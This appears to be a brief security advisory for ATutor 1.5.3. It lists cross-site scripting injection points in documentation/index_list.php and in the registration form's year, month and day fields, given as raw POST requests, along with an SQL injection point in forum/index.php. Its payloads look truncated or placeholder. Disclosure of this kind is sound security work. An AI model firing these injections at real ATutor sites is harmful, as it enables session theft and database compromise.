ATutor 1.5.3 http://www.atutor.ca -------------------------- Cross Site Scripting (XSS) -------------------------- http://target.xx/documentation/index_list.php?lang="> --- POST http://target.xx:80/registration.php?register=Register HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx ml=1&year="> --- POST http://target.xx:80/registration.php?register=Register HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx ml=1&month="> --- POST http://target.xx:80/registration.php?register=Register HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx ml=1&day="> ------------- SQL injection ------------- http://target.xx/forum/index.php?fid=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org